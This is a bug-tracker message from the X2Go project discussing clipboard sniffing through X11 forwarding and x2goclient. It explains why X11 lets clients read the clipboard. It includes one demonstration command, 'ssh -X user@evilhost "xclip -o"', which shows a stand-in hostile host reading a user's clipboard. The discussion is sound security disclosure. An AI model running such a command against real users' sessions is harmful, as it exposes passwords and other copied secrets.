X2Go Bug report logs - #509
Document NX/X11 security issue: clipboard sniffing

Package: wiki.x2go.org; Maintainer for wiki.x2go.org is x2go-dev@lists.x2go.org;

Reported by: Christoph Anton Mitterer <calestyo@scientia.net>

Date: Mon, 1 Jul 2013 02:48:02 UTC

Severity: grave

Tags: security

Full log

🔗 View this message in rfc822 format

X-Loop: owner@bugs.x2go.org
Subject: Bug#258: [X2Go-Dev] Bug#258: Bug#258: SECURITY: x2goclient allows clipboard sniffing
Reply-To: Alexander Wuerstlein <snalwuer@cip.informatik.uni-erlangen.de>, 258@bugs.x2go.org
Resent-From: Alexander Wuerstlein <snalwuer@cip.informatik.uni-erlangen.de>
Resent-To: x2go-dev@lists.berlios.de
Resent-CC: X2Go Developers <x2go-dev@lists.berlios.de>
X-Loop: owner@bugs.x2go.org
Resent-Date: Mon, 01 Jul 2013 14:03:02 +0000
Resent-Message-ID: <handler.258.B258.13726872933942@bugs.x2go.org>
Resent-Sender: owner@bugs.x2go.org
X-X2Go-PR-Message: followup 258
X-X2Go-PR-Package: x2goclient
X-X2Go-PR-Keywords: security
Received: via spool by 258-submit@bugs.x2go.org id=B258.13726872933942
          (code B ref 258); Mon, 01 Jul 2013 14:03:02 +0000
Received: (at 258) by bugs.x2go.org; 1 Jul 2013 14:01:33 +0000
X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on
	ymir.das-netzwerkteam.de
X-Spam-Level: 
X-Spam-Status: No, score=0.0 required=5.0 tests=RCVD_IN_DNSWL_BLOCKED,
	URIBL_BLOCKED autolearn=ham version=3.3.2
Received: from faui03.informatik.uni-erlangen.de (faui03.informatik.uni-erlangen.de [131.188.30.103])
	by ymir (Postfix) with ESMTPS id D43925DA79
	for <258@bugs.x2go.org>; Mon,  1 Jul 2013 16:01:32 +0200 (CEST)
Received: from faui0sr0.informatik.uni-erlangen.de (faui0sr0.informatik.uni-erlangen.de [131.188.30.90])
	by faui03.informatik.uni-erlangen.de (Postfix) with ESMTP id 7473468098D;
	Mon,  1 Jul 2013 16:01:32 +0200 (CEST)
Received: by faui0sr0.informatik.uni-erlangen.de (Postfix, from userid 31763)
	id 6B33BB28316; Mon,  1 Jul 2013 16:01:32 +0200 (CEST)
Date: Mon, 1 Jul 2013 16:01:32 +0200
From: Alexander Wuerstlein <snalwuer@cip.informatik.uni-erlangen.de>
To: Christoph Anton Mitterer <calestyo@scientia.net>, 258@bugs.x2go.org
Message-ID: <20130701140132.GQ2447@cip.informatik.uni-erlangen.de>
References: <1372646308.18508.2.camel@heisenberg.scientia.net>
 <20130701114356.GP2447@cip.informatik.uni-erlangen.de>
 <1372682609.25918.14.camel@heisenberg.scientia.net>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <1372682609.25918.14.camel@heisenberg.scientia.net>
X-Echelon-Scan: plutonium bomb osama revenge dirty allah satan iran victory
 dimona cocaine guantanamo centrifuge holy war pigs mossad nsa
X-Echelon-Result: Belligerent
User-Agent: Mutt/1.5.21 (2010-09-15)

On 13-07-01 15:03, Christoph Anton Mitterer <calestyo@scientia.net> wrote:
> On Mon, 2013-07-01 at 13:43 +0200, Alexander Wuerstlein wrote: 
> > Yes, other related tools like X11. x2go is basically just a faster
> > version of the traditional xforwarding. In X11 every client can always
> > access the clipboard/selection/etc., so you will also have the same
> > security problems (by design). E.g. 'ssh -X user@evilhost "xclip -o"'
> > demonstrates this.
> Well but that "argument" doesn't really count:
> 1) Just because others do it plainly insecure, you cannot do it like
> this as well... like as if Gentoo would say "if Debian breaks their
> OpenSSL entropy, we should do so, too"... o.O

It isn't like that at all, X11 clients and servers have to comply with
the respective parts of the protocol. If the protocol demands insecure
behaviour, its a design bug, or maybe, like in this case, a compromise
nobody likes: Since in X11 clients handle all the shortcuts and mouse
button events, since clients or toolkits handle the widgets, the only
option to implement C&P is to have clients ask the server for the
clipboard or selection contents. Its more a "there is no other way to do
it except to make it unusable" kind of problem imho.

> 2) Literally no one who has a decent mind of security, will allow other
> hosts do directly access their X server.. because then you're (security
> wise) anyway screwed...

I'm not only talking about 'xhost +' and the like, this would of course
be a major problem for more reasons than only the clipboard. And if you
wouldn't trust a host with 'ssh -X', then you also shouldn't trust it
with x2go. Just think of x2go as a variant of 'ssh -X' with image
compression and some extras. X11 protocol firewalling is not really one
of those extras. And since the x2goclient will always run in your local
X session, it will always be able to read your clipboard.

> And I thought NX would secure what's sent from remote in order to not
> being able to overtake the input/output devices of the hosts (whole)
> Xserver).

In a way, yes. Afaik you can avoid certain attacks of the "I'll attach
to the root window and get all key events" kind since windowed x2go
sessions give you a separate root window. But I imagine there are more
problems out there nobody thought of yet.



Ciao,

Alexander Wuerstlein.

Send a report that this bug log contains spam.

X2Go Developers <owner@bugs.x2go.org>. Last modified: Thu Nov 21 14:54:58 2024; Machine Name: ymir.das-netzwerkteam.de

X2Go Bug tracking system

Debbugs is free software and licensed under the terms of the GNU Public License version 2. The current version can be obtained from https://bugs.debian.org/debbugs-source/.

Copyright © 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson, 2005-2017 Don Armstrong, and many other contributors.